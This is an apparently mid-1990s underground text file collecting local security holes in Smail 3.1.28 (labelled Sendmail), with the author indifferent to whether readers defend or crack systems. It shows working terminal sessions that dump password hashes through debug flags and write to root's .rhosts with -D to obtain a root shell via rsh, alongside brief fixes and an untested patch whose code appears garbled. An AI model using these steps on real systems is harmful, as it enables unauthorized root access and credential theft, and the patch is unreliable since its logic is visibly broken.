This is written for anyone thats interested in learning about the many Security holes that are resident in many versions of Sendmail. I do not care if you use it to protect your system against others, or crack other ppls systems...just don't involve me in it.
I wrote it to collate all the information on sendmail into one list for convience and perhaps it will help some people.
I would like to thank the unknown person who started this off long time ago....
This paper is (c) 1995, however I do not object, to you including any of these in a FAQ, printed magazine, book etc... just mail me first so I known where it's distributed *:^)
Have you spotted a mistake or anything I could add? Then just add your own stuff and put yourself down on the credits and mail it me :)
Note: This is v.01b so there is bound to be mistakes and there are a lot
of other stuff to add as well....and expand it to include FTP daemon
bugs?
I am extremely busy..and am only releasing it due to popular demand.
OH, please tell me what versions these work on!
Sendmail Version affected: 3.1.28, any more ?
Use of ~/.forward and debug lets a local user read any file on the system.
We can just do this....
user@psyops ~> smail -bs -v20 expand_string($primary_name Smail$version ready for mail on $date,(null), (null)) called expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT 220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT expn user [same text as before] expand_string(~/.forward, /home/user, user) called expand_string returns /home/user/.forward dtd_forwardfile: opening forward file /home/user/.forward [more of same text] read 890 bytes director dotforward: matched user, forwarded to root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7::: bin:*:8000:0:99999:7::: daemon:*:8000:0:99999:7::: nobody:*:8000:0:99999:7::: user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7::: [.....] process_field: entry We have a group We have a group process_field: error: recursive address group 550 user ... not matched quit 221 psyops.warez.mil closing connection
To fix this, you should get rid of the -d and -v options for smail as well as adding -smtp_debug to your config file.
Sendmail Version affected: 3.1.28, any more ?
Smail called with the -D flag will allow you to create and append to any file on the system.
user@psyops ~> cat > ~/.forward localhost user ^D user@psyops ~> smail -bs -D ~root/.rhosts -v20 220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12 :23 PDT expn user 250 user quit 221 psyops.warez.mil closing connection user@psyops ~> rsh -l root localhost tcsh\ -i Warning: no access to tty (Bad file number). Thus no job control in this shell. # id uid=3D0(root) gid=3D0(root)
Patch this by removing the -D option from smail.
I received the following patch recently. I haven't tested it, so use at your own risk.
*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}
- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile =3D fopen(arg_debug_file, "a");
- if (new_errfile =3D=3D NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file =3D NULL;
- } else {
- errfile =3D new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
- program, (long)getpid());
- }
- }
/*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid !=3D REQUIRED_EUID)
queue_only =3D TRUE;
#endif
+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/setgid
+ * calls to allow for use of fopen_as_user() instead of just
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug file
+ */
+
+ if (arg_debug_file) {
+ new_errfile =3D fopen_as_user(arg_debug_file, "a", 1, real_uid,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file =3D NULL;
+ } else {
+ errfile =3D new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
+ program, (long)getpid());
+ }
+ }
/*
* error processing can be other than TERMINAL only for
Sendmail Version affected: ?
Files specified in ~/.forward can be created in any directory, regardless of it's permissions. (File is still owned by mailbox owner, however.)